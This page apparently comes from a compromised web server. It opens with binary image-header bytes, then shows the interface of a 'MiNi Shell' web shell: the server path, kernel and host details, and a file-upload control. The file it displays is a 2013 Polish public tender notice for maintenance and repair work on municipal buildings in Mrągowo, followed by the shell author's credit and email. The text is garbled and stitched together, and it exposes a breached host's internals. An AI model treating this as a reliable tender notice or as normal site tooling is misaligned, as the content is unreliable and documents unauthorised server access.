JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131209/266317-N-2013.html

<p class="kh_header"><b>Mrągowo: Wykonywanie  robót  konserwacyjnych  i drobnych robót  remontowych  w  budynkach  i  lokalach  komunalnych  stanowiących  własność  Gminy  Miasto Mrągowo, administrowanych  przez  TBS  KARO  Sp. z o.o. w Mrągowie.</b><br>
<b>Numer ogłoszenia: 266317 - 2013; data zamieszczenia: 09.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Towarzystwo Budownictwa Społecznego "Karo" Sp. z o.o. , ul. Kopernika 11, 11-700 Mrągowo, woj. warmińsko-mazurskie, tel. 089 7410600, faks 089 7417283.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tbs.mragowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie  robót  konserwacyjnych  i drobnych robót  remontowych  w  budynkach  i  lokalach  komunalnych  stanowiących  własność  Gminy  Miasto Mrągowo, administrowanych  przez  TBS  KARO  Sp. z o.o. w Mrągowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest :
Wykonywanie  robót  konserwacyjnych  i  robót  remontowych  w  budynkach  i  lokalach  komunalnych  stanowiących  własność  Gminy  Miasto  Mrągowo, administrowanych  przez  TBS  KARO  Sp. z o.o. w Mrągowie. 

  	Zakres  robót :
1)	Pokrycia  dachowe, elewacja  budynków  oraz  stolarka  okienna  i  drzwiowa :
-	łatanie  i  naprawa  drobnych  uszkodzeń  pokrycia  dachowego, łącznie  z  wymianą  na  powierzchni  do  3 m2,
-	miejscowe  uszczelnianie  pokrycia  dachowego  poprzez  smarowanie  pokrycia  papowego  i  zalania  środkiem  uszczelniającym  o  powierzchni  do  3 m2 ,
-	naprawa  przez  lutowanie  drobnych  uszkodzeń, prostowanie  i  mocowanie  obróbek  blacharskich, daszków, gzymsów, pasów  podrynnowych, parapetów  zewnętrznych  i  innych  występujących  na  elewacji  i  dachu  łącznie  z  zabezpieczeniem  antykorozyjnym  do  5%  ogółu  elementów  występujących  na  budynku,
-	oczyszczanie  rynien  i  rur  spustowych, udrożnienie  kratek  rewizyjnych,
-	naprawa  drobnych  uszkodzeń  więźby  nie  wymagająca  naruszenia  pokrycia  dachowego,
-	pojedyncza  wymiana, uzupełnienie  lub  uszczelnienie  pokrycia  dachówkowego  względnie  gąsiora  do  5%  powierzchni  dachu,
-	naprawa  włazów  dachowych, elementów  drabin, klamer  włazowych  prowadzących  na  dach, ław  kominiarskich,
-	naprawa  tynku  bez  względu  na  rodzaj  podłoża  z  usunięciem  gruzu  do  2 m2  na  budynku,
-	usunięcie  drobnych  uszkodzeń  w  elementach  elewacji  budynku  (gzymsy, elementy  balkonowe, loggie, zadaszenia  na  wejściami  do  klatek  schodowych, murki  oporowe)  do  2 m2  na  budynku,
-	naprawa  drobnych  uszkodzeń  posadzek  i  schodów  do  2 m2 na  budynku,
-	zamurowanie  i  wykonanie  przebić  w  ścianach  i  stropach  do  3  szt.  w  budynku,
-	udrożnienie  kanałów  kominowych  i  drobna  naprawa  tych  kanałów  i  główek  kominowych,
-	uzupełnienie  spoinowania  zewnętrznego  kominów  względnie  uzupełnienia  tynku  do  5%  powierzchni  kominów,
-	naprawa  ogrodzeń  i  bram, uzupełnienie  pojedynczych  elementów  na  łącznej  długości  do  1 mb,
-	uzupełnienie  wybitych  szyb  lub  okitowanie  w  drzwiach  i  oknach  pomieszczeń  wspólnego  użytku  oraz  naprawa  tej  stolarki  poprzez  pasowanie  lub  flekowanie, naprawa  regulacja  i  wymiana  okuć  stolarskich,
-	przygotowanie  budynku  do  okresu  zimowego, sprawdzenie  szczelności  drzwi  i  okien  w  pomieszczeniach  wspólnego  użytku,
-	usuwanie  miejscowych  zapadnięć  i  nierówności  w  chodnikach  i  drogach  do  4 m2  powierzchni  w  jednym  miejscu,
-	konserwacja  małej  architektury  poprzez  malowanie, drobne  uzupełnienia  elementów  w  sprzęcie  zabawowym.

2)	Instalacja  wodno-kanalizacyjna :
-	sprawdzenie  prawidłowości  działania  wodomierza  głównego  oraz  jego  wskazań,
-	sprawdzenie  stanu  instalacji  wodnej  z  ewentualnym  usunięciem  nieszczelności,
-	uszczelnienie  zaworów  czerpalnych  i  przelotowych  lub  ich  wymiana,
-	malowanie  okresowe  rur  wodociągowych,
-	zabezpieczanie  instalacji  przed  zamarzaniem,
-	czyszczenie  i  udrażnianie pionów  i  poziomów  kanalizacyjnych,
-	naprawianie  rur  wywietrznikowych  zamontowanych  na  pionie  kanalizacyjnym,
-	uszczelnianie  złącz  na  pionach  i  poziomach  kanalizacyjnych,
-	okresowy  przegląd  i  czyszczenie  rewizji.

3)	Instalacja  gazowa :
-	dokonywanie  oględzin  i  sprawdzanie  instalacji  gazowej  w  budynku  wraz  z  lokalizacją  ewentualnych  nieszczelności,
-	przeprowadzanie  prób  szczelności  instalacji  lub  jej  części  w  razie  podejrzeń  o  nieszczelność,
-	malowanie  okresowe  rur,
-	okresowe  kontrolowanie  stanu  technicznego  zaworów  odcinających  przed  urządzeniami  odbiorczymi,
-	uszczelnianie  instalacji  w  pojedynczych  mieszkaniach  nie  wymagających  uszczelnień  lokali  na  całym  pionie,
-	utrzymanie  w  czystości  skrzynek  gazowych.

4)	Instalacja  centralnego  ogrzewania
-	przeprowadzanie  przeglądów  instalacji  i  grzejników  przed  rozpoczęciem  sezonu  grzewczego  i  po  jego  zakończeniu,
-	w  uzasadnionych  przypadkach  spuszczanie  i  napełnianie  czynnika  grzewczego  w  instalacji,
-	skontrolowanie  stanu  technicznego  z  ewentualnym  uszczelnieniem  oraz  pojedyncza  wymiana  wszystkich  rodzajów  zaworów  występujących  na  instalacji,
-	odpowietrzanie  instalacji  (w  tym  grzejników).

5)	Instalacja  elektryczna  (od  złącza  kablowego  Z.E. do  licznika  energii  elektrycznej  użytkownika  lokalu) :
-	wymiana  lub  uzupełnianie  żarówek  w  lampach  na  klatkach  schodowych, piwnicach, korytarzach, itp.,
-	uzupełnianie  brakujących  kloszy,
-	zakładanie, naprawianie, wyregulowanie  lub  wymiana  automatów  schodowych,
-	wymiana  bezpieczników  i  główek  bezpiecznikowych  w  obwodzie  administracyjnym  budynku,
-	wymiana  gniazd  bezpiecznikowych  w  obwodzie  administracyjnym  budynku,
-	wymiana  i  uzupełnienie  brakujących  dekli  w  puszkach  elektrycznych,
-	utrzymywanie  skrzynek  elektrycznych  w  czystości, sprawdzenie  umocowania  przewodów  elektrycznych,
-	wyszukiwanie  przerw  i  zwarć  w  instalacji  oraz  usuwanie  przyczyn  wraz  z  wymianą  upalonych  końcówek,
-	usuwanie  uszkodzeń  w  instalacji  odgromowej  bez  wymiany  poszczególnych  elementów,
-	dokonywanie  okresowych  pomiarów  instalacji  elektrycznej  WLZ  oraz  odgromowej,
                   -    konserwacja  instalacji  anten AZART.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.71.00.00-5, 50.72.00.00-8, 50.51.20.00-7, 50.51.30.00-4, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz referencji dotyczących wykonanych lub wykonywanych usług dotyczących robót konserwacyjnych i remontowych w zakresie niezbędnym do wykazania spełniania warunków wiedzy i doświadczenia  w okresie ostatnich trzech lat przed upływem terminu składania ofert o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
Zamawiający dokona oceny spełnienia powyższego warunku na podstawie złożonych (przez wykonawcę, podmioty występujące wspólnie) dokumentów na zasadzie spełnia/nie spełnia.
Wymagane dokumenty należy przedstawić w formie oryginałów albo kserokopii. 
Dokumenty złożone w formie kserokopii nie potwierdzone notarialnie muszą być opatrzone klauzulą ZA ZGODNOŚĆ Z ORYGINAŁEM i poświadczone za zgodność z oryginałem przez wykonawcę na każdej stronie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Zamawiający dokona oceny spełnienia powyższego warunku na podstawie złożonych (przez wykonawcę, podmioty występujące wspólnie) dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, iż w przypadku gdy złożona oferta będzie najkorzystniejsza w przedmiotowym postępowaniu  to w dniu podpisania umowy Wykonawca dostarczy Zamawiającemu oryginał opłaconej polisy ubezpieczeniowej do wglądu oraz pozostawi Zamawiającemu kserokopię przedmiotowej polisy opatrzoną klauzulą ZA ZGODNOŚĆ Z ORYGINAŁEM  i poświadczoną za zgodność z oryginałem przez Wykonawcę a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na okres obejmujący czas realizacji przedmiotu zamówienia.
Zamawiający dokona oceny spełnienia powyższego warunku na podstawie złożonych (przez wykonawcę, podmioty występujące wspólnie) dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Oświadczenie, iż w przypadku gdy złożona oferta będzie najkorzystniejsza w przedmiotowym postępowaniu  to w dniu podpisania umowy Wykonawca dostarczy Zamawiającemu oryginał opłaconej polisy ubezpieczeniowej do wglądu oraz pozostawi Zamawiającemu kserokopię przedmiotowej polisy opatrzoną klauzulą ZA ZGODNOŚĆ Z ORYGINAŁEM  i poświadczoną za zgodność z oryginałem przez Wykonawcę a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na okres obejmujący czas realizacji przedmiotu zamówienia.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku wnoszenia oferty wspólnej przez dwa podmioty gospodarcze lub więcej podmiotów, każdy wykonawca oddzielnie nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ust. 1, a także musi spełniać wymogi oraz łączne warunki o których mowa w art. 22 ust. 1 ustawy Pzp. (należy przedłożyć dokumenty dotyczące tych podmiotów w zakresie wymaganym dla Wykonawcy). 

Podmioty chcące wspólnie ubiegać się o zamówienie muszą dostarczyć podpisany list intencyjny i ustanowić wspólnego pełnomocnika (art. 23 ustawy Pzp). Ponoszą one solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia określoną w art. 366 Kodeksu cywilnego. 
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art. 26 ust. 2b ustawy Pzp).  

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej: 
Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4 zastępuje się je dokumentem   zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem.
W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę mającego  siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.

Inne dokumenty wymagane przez Zamawiającego:
- Oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia, wynikających z art. 22 ust. 1 ustawy Pzp,
-  Oświadczenie  o braku zaległości podatkowych w Urzędzie Skarbowym bądź oświadczenie, o uzyskaniu przewidzianego prawem zwolnienia, odroczenia lub rozłożenia na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 m-ce przed terminem złożenia ofert)
Uwaga: W przypadku spółek cywilnych do oferty należy dołączyć przedmiotowe oświadczenie zarówno na spółkę jaki na każdego ze wspólników,
- Oświadczenie o braku zaległości w ZUS z tytułu opłacania składek na ubezpieczenia społeczne i zdrowotne bądź oświadczenie, o uzyskaniu przewidzianego prawem zwolnienia, odroczenia lub rozłożenia na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 m-ce przed terminem złożenia ofert)
Uwaga: W przypadku spółek cywilnych do oferty należy dołączyć przedmiotowe oświadczenie zarówno na spółkę jaki na każdego ze wspólników,
- Wskaźniki cenotwórcze do rozliczania robót przewidzianych w projekcie umowy (R, Kp, Z, Kz)
- upoważnienie dla osoby uprawnionej do składania oświadczeń woli w imieniu Wykonawcy (należy dostarczyć pełnomocnictwo dla osoby podpisującej ofertę w formie oryginału lub kserokopii potwierdzonej notarialnie; nie dotyczy władz statutowych firmy Wykonawcy).
- wypełniony Formularz Ofertowy,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści   
     oferty, na podstawie której dokonano wyboru Wykonawcy w następującym zakresie:      
1.	Wynagrodzenie Wykonawcy określone w umowie może ulec zmianom w następujących przypadkach:
- zmiana stawki urzędowej podatku VAT,
2.	Inne zmiany:    
- w zakresie podwykonawstwa za uprzednią zgodą Zamawiającego; powierzenie podwykonawcom innej części prac niż wskazana w ofercie Wykonawcy,
- w przypadku zmiany przepisów będących podstawą ustalenia obowiązków Zamawiającego i Wykonawcy określonych niniejszą umową.
3.	Warunki zmian:
- inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
- uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, obniżenie kosztów,
zmiana postanowień zawartych w umowie może nastąpić za zgodą obu stron, wyrażoną na piśmie pod rygorem nieważności, przy zachowaniu postanowień art.144 Ustawy Prawo zamówień publicznych.   
     II.  Inne postanowienia:
           W zakresie zmiany treści załączników nr1 i nr2 do umowy tj. zmiany: wykazu budynków i lokali 
           oraz wykazu robót konserwacyjnych i drobnych robót remontowych, włącznie z wykreśleniem 
           lub dodaniem pozycji w przedmiotowych wykazach. Wprowadzone zmiany w załącznikach nr1 i 
           nr2 do umowy obowiązywać  będą  od  dnia  powiadomienia Wykonawcy w formie pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tbs.mragowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Towarzystwo Budownictwa Społecznego KARO Sp. z o.o., 11-700 Mrągowo, ul. Kopernika 11 (pokój nr 9).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2013 godzina 10:30, miejsce: Towarzystwo Budownictwa Społecznego KARO Sp. z o.o., 11-700 Mrągowo, ul. Kopernika 11 (pokój nr 13).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com